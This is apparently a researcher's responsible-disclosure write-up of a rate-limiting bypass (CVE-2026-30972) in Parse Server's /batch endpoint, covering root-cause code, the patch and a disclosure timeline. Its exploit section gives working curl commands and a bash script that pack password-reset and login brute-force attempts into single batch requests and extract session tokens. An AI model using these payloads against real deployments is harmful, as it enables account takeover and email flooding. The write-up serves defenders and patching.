TL;DR — Parse Server — 21,000+ GitHub stars, 23,000+ weekly npm downloads — has a rate limiting bypass in the /batch endpoint. Rate limits are enforced at the Express middleware layer, but the batch handler routes sub-requests internally through the Promise router, completely skipping Express middleware. An attacker can stuff hundreds of requests to a rate-limited endpoint into a single batch call and every one goes through. If you're relying on Parse Server's built-in rate limiting to protect password reset, login, or any other sensitive endpoint — it doesn't work against someone who knows about /batch. Assigned CVE-2026-30972. Severity: Medium.

why this matters

Rate limiting exists for a reason. Brute-force login attempts, password reset abuse, OTP enumeration, credential stuffing — all of these attacks rely on making lots of requests fast. When you configure a rate limit of, say, 10 requests per minute on /requestPasswordReset, you expect the server to enforce that. Parse Server even has a dedicated rateLimit configuration option for exactly this use case, backed by express-rate-limit.

The problem is that the batch endpoint provides a parallel route into every API endpoint, and that parallel route was never wired through the rate limiting middleware. Every deployment relying on Parse Server's built-in rate limiting is affected.

the root cause: Express middleware vs. Promise router

Parse Server has two routing layers. There's the Express layer — the standard middleware stack where rate limiting, authentication, session handling, and other middleware run. And there's the Promise router — an internal routing system that maps method/path pairs to handler functions without going through Express.

When a normal request hits POST /parse/requestPasswordReset, it goes through the full Express middleware stack:

Client Request
  -> Express middleware stack
    -> handleRateLimit()      // <-- rate limit checked here
    -> handleParseHeaders()
    -> handleParseSession()
  -> Route handler
  -> Response

The rate limit middleware in middlewares.js runs express-rate-limit for every matching path:

const handleRateLimit = async (req, res, next) => {
  const rateLimits = req.config.rateLimits || [];
  try {
    await Promise.all(
      rateLimits.map(async limit => {
        const pathExp = limit.path.regexp || limit.path;
        if (pathExp.test(req.url)) {
          await limit.handler(req, res, err => {  // express-rate-limit handler
            if (err) {
              if (err.code === Parse.Error.CONNECTION_FAILED) {
                throw err;
              }
            }
          });
        }
      })
    );
  } catch (error) {
    res.status(429);
    res.json({ code: Parse.Error.CONNECTION_FAILED, error: error.message });
    return;
  }
  next();
};

But when a batch request hits POST /parse/batch, the batch handler processes each sub-request by calling router.tryRouteRequest() directly on the Promise router:

// The vulnerable handleBatch function (pre-patch)
function handleBatch(router, req) {
  if (!Array.isArray(req.body?.requests)) {
    throw new Parse.Error(Parse.Error.INVALID_JSON, 'requests must be an array');
  }

  const makeRoutablePath = makeBatchRoutingPathFunction(
    req.originalUrl, req.config.serverURL, req.config.publicServerURL
  );

  // No rate limit check here. Sub-requests go straight to the router.
  const batch = transactionRetries => {
    let initialPromise = Promise.resolve();
    if (req.body?.transaction === true) {
      initialPromise = req.config.database.createTransactionalSession();
    }
    return initialPromise.then(() => {
      const promises = req.body?.requests.map(restRequest => {
        const routablePath = makeRoutablePath(restRequest.path);
        const request = {
          body: restRequest.body,
          config: req.config,
          auth: req.auth,
          info: req.info,
        };
        // Direct call to Promise router -- bypasses Express middleware entirely
        return router.tryRouteRequest(restRequest.method, routablePath, request).then(
          response => { return { success: response.response }; },
          error => { return { error: { code: error.code, error: error.message } }; }
        );
      });
      return Promise.all(promises).then(results => {
        return { response: results };
      });
    });
  };
  return batch(5);
}

The key line is router.tryRouteRequest(). Here's what that method does in the Promise router:

tryRouteRequest(method, path, request) {
  var match = this.match(method, path);
  if (!match) {
    throw new Parse.Error(Parse.Error.INVALID_JSON, 'cannot route ' + method + ' ' + path);
  }
  request.params = match.params;
  return new Promise((resolve, reject) => {
    match.handler(request).then(resolve, reject);  // Direct handler call, no middleware
  });
}

It matches the route and calls the handler directly. No Express. No middleware. No rate limit. The batch endpoint is effectively a portal into every API endpoint that bypasses the entire middleware stack.

the exploit

Suppose you have a Parse Server with rate limiting configured on the password reset endpoint:

// Parse Server config
{
  rateLimit: [{
    requestPath: '/requestPasswordReset',
    requestTimeWindow: 60000,   // 1 minute window
    requestCount: 3,            // max 3 requests per minute
    errorResponseMessage: 'Too many password reset requests'
  }]
}

normal requests: rate limit works

Send four password reset requests individually and the fourth gets blocked:

# Requests 1-3: succeed
for i in 1 2 3; do
  curl -s -o /dev/null -w "%{http_code}" \
    -X POST "https://parse.example.com/parse/requestPasswordReset" \
    -H "X-Parse-Application-Id: APP_ID" \
    -H "X-Parse-REST-API-Key: REST_KEY" \
    -H "Content-Type: application/json" \
    -d '{"email":"[email protected]"}'
done
# Output: 200 200 200

# Request 4: rate limited
curl -s -w "\n%{http_code}" \
  -X POST "https://parse.example.com/parse/requestPasswordReset" \
  -H "X-Parse-Application-Id: APP_ID" \
  -H "X-Parse-REST-API-Key: REST_KEY" \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]"}'
# Output: {"code":100,"error":"Too many password reset requests"}
# 429

Good. The rate limit works. For direct requests.

batch bypass: rate limit doesn't work

Now wrap 50 identical password reset requests into a single batch call:

# Generate 50 sub-requests in a single batch call
curl -s -X POST "https://parse.example.com/parse/batch" \
  -H "X-Parse-Application-Id: APP_ID" \
  -H "X-Parse-REST-API-Key: REST_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "requests": [
      {"method":"POST","path":"/parse/requestPasswordReset","body":{"email":"[email protected]"}},
      {"method":"POST","path":"/parse/requestPasswordReset","body":{"email":"[email protected]"}},
      {"method":"POST","path":"/parse/requestPasswordReset","body":{"email":"[email protected]"}},
      ... (50 total)
    ]
  }'
# All 50 succeed. Zero rate limiting applied.

All 50 go through. The rate limit of 3 per minute is completely irrelevant. The batch endpoint processes each sub-request by calling tryRouteRequest() on the Promise router, which never passes through the Express middleware where handleRateLimit lives.

brute-force login via batch

The same bypass applies to any rate-limited endpoint. Here's a login brute-force:

# Brute-force login: 100 password attempts in a single HTTP request
curl -s -X POST "https://parse.example.com/parse/batch" \
  -H "X-Parse-Application-Id: APP_ID" \
  -H "X-Parse-REST-API-Key: REST_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "requests": [
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"password1"}},
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"password2"}},
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"password3"}},
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"letmein"}},
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"admin123"}}
    ]
  }'

Each sub-request returns either a success (with session token) or an error (invalid credentials). The attacker can try hundreds of passwords per second with a single HTTP connection, completely bypassing whatever rate limit was configured on /login.

automating at scale

# Generate a batch payload with a password list
passwords=("password" "123456" "admin" "letmein" "welcome" "monkey" "dragon")
requests=""
for pw in "${passwords[@]}"; do
  requests+='{"method":"POST","path":"/parse/login","body":{"username":"admin","password":"'$pw'"}},'
done
requests="${requests%,}"  # trim trailing comma

curl -s -X POST "https://parse.example.com/parse/batch" \
  -H "X-Parse-Application-Id: APP_ID" \
  -H "X-Parse-REST-API-Key: REST_KEY" \
  -H "Content-Type: application/json" \
  -d "{\"requests\":[$requests]}" | jq '.[] | select(.success)'

If any password matches, the response includes the session token. One HTTP request, unlimited attempts.

impact

Any Parse Server deployment that relies on the built-in rateLimit configuration is affected. The batch endpoint bypasses rate limits on every path.

AttackImpact
Login brute-forceUnlimited password attempts via batch, bypassing login rate limits
Password reset abuseFlood victim with reset emails, bypassing /requestPasswordReset limits
OTP/verification enumerationEnumerate verification codes at scale without hitting rate limits
DoS amplificationMultiply the impact of expensive operations by batching hundreds per request

The severity is Medium (CVSS 5.3) because the vulnerability bypasses a security control but doesn't directly grant unauthorized access on its own. It's an enabler — it makes other attacks (brute-force, credential stuffing, DoS) feasible by removing the rate limit guardrail.

the fix

The patch adds a pre-flight check in the batch handler that counts how many sub-requests target each rate-limited path and rejects the entire batch if any path's count exceeds its requestCount:

// New code added to handleBatch (post-patch)
const rateLimits = req.config.rateLimits || [];
for (const limit of rateLimits) {
  // Skip if master key and includeMasterKey is not set
  if (req.auth?.isMaster && !limit.includeMasterKey) {
    continue;
  }
  // Skip for internal requests if includeInternalRequests is not set
  if (req.config.ip === '127.0.0.1' && !limit.includeInternalRequests) {
    continue;
  }
  const pathExp = limit.path.regexp || limit.path;
  let matchCount = 0;
  for (const restRequest of req.body.requests) {
    // Check method filter
    if (limit.requestMethods) {
      const method = restRequest.method?.toUpperCase();
      if (Array.isArray(limit.requestMethods)) {
        if (!limit.requestMethods.includes(method)) continue;
      } else {
        const regExp = new RegExp(limit.requestMethods);
        if (!regExp.test(method)) continue;
      }
    }
    const routablePath = makeRoutablePath(restRequest.path);
    if (pathExp.test(routablePath)) {
      matchCount++;
    }
  }
  if (matchCount > limit.requestCount) {
    throw new Parse.Error(
      Parse.Error.CONNECTION_FAILED,
      limit.errorResponseMessage || 'Batch request exceeds rate limit for endpoint'
    );
  }
}

An important caveat from the advisory: this is a server-level rate limit that only counts sub-requests within a single batch request. Requests already consumed in the current time window by previous individual or batch requests are not counted against the batch. So the effective limit may be higher when combining individual and batch requests. The advisory explicitly recommends using a reverse proxy or WAF for comprehensive rate limiting protection.

Patched versions:

Workaround: use a reverse proxy or web application firewall (WAF) to enforce rate limiting before requests reach Parse Server. This is the more robust approach regardless of whether you patch, since the server-level fix only counts within a single batch.

the broader pattern

This is a classic instance of a pattern I keep running into: internal routing that bypasses the middleware stack. Any time a framework provides a "batch" or "multiplex" endpoint that re-routes sub-requests internally, every piece of middleware that normally runs on those endpoints needs to be explicitly re-applied. Rate limiting. Authentication. CSRF protection. Logging. If the batch handler skips the middleware layer, all of those controls vanish for batched requests.

Parse Server's architecture makes this especially clear. The Promise router was designed as an alternative to Express routing — the source code comment says it outright: "This is intended to replace the use of express.Router to handle subsections of the API surface." But Express middleware and Promise router handlers live in different worlds. When middleware is registered on the Express side, the Promise router has no awareness of it. Batch goes through the Promise router. Middleware stays on Express. The result is a gap that existed since the rate limiting feature was introduced.

The lesson generalizes beyond Parse Server. GraphQL has the same pattern with query batching. Any API gateway that supports request multiplexing has the same risk. If your rate limiting is implemented at the transport layer (HTTP middleware) and your batch processing happens at the application layer (internal routing), the batch endpoint is a rate limit bypass by design. You have to either enforce limits at both layers or enforce them at the application layer where batch processing happens.

disclosure timeline

DateEvent
Mar 8, 2026Vulnerability reported to parse-community via GitHub Security Advisory
Mar 8, 2026Fix PR #10147 submitted and merged
Mar 10, 2026CVE-2026-30972 assigned by GitHub
Mar 10, 2026Patched versions released (9.5.2-alpha.10, 8.6.23)

This vulnerability was reported through responsible disclosure to the parse-community security team.